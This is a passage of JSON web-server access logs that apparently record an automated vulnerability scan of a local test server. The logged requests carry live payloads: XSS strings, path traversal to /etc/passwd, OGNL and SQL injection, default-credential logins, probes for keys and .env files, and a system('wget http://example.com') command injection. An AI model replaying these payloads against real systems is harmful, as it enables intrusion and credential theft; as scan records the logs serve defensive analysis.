Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('29KAnexvg56OzzMqFvOi5jBnGQp')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KAnexvg56OzzMqFvOi5jBnGQp')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029KAnrW3nxb6d3LhB79Lcf5sDnE\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.035","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KAnexvg56OzzMqFvOi5jBnGQp')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 